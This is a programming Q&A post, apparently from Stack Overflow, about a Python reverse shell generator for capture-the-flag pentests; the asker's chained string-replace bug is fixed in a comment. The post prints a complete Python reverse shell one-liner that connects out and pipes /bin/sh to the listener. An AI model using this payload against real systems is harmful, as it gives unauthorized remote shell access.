# Removing multiple strings in a file replace() not working

Tags: python, python-3.x, regex, replace

I am at the moment experiencing some issues with my code. I am creating a reverse shell generator that automates with pentests for Capture flag competitions.

The script will read a file containing payloads, further the script will choose a specific line to be fetched and then replace the back connect ip address and port and output the payload to the user. 
However i am stuck on some issues. The issue is that i am trying to replace two different strings upon reading a file containing my text, one of the strings gets replaced, while the other do not:

- Strings to be replaced

[ip]

[port]

I have as well reviewed previous article using regex, but did not get further luck. Recieving error on the regex part that is commented out in my code: "unexpected token"

My code:

```
import socket
import base64
import hashlib
import re 
import os # Fetching ip from interface
import linecache # for reading specific lines

ip = str(input("Host ip\n"))
port = str(input("port\n"))
#shell = str(input("Please select an option?\n"))
def full():
    print("Welcome, lets generate a choosen reverse shell\n")
    global ip
    global port

    print("please select language and shell option:\n [1] - python(Alphanumeric reverse shell)\n, [2] PHP(Alphanumeric reverse shell)\n")
    selection = input("Type in number:\t")
    if int(selection) == 1:
        with open("myshells.txt", "r") as shells:
            #for myreplace in (("[ip]", ip), ("[port]", port)):
            fetchshell = linecache.getline('myshells.txt', 1)
            ipreplaced = fetchshell.replace("[ip]", ip)
            ipreplaced = fetchshell.replace("[port]", port)
            print(ipreplaced)
        """for line in fetchshell:
            myport = line.write(re.sub(r"(port)", port))
            myip = line.write((re.sub(r"(ip)", ip))
            print(line)"""
```

File contents:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Sample output from above code:

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(([ip],22));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Comment: You need to do the second `.replace()` on the output of the first, otherwise the first replacements are just being thrown away.

Comment: @jasonharper Thank you! That fixed it. Appreciate the help and time.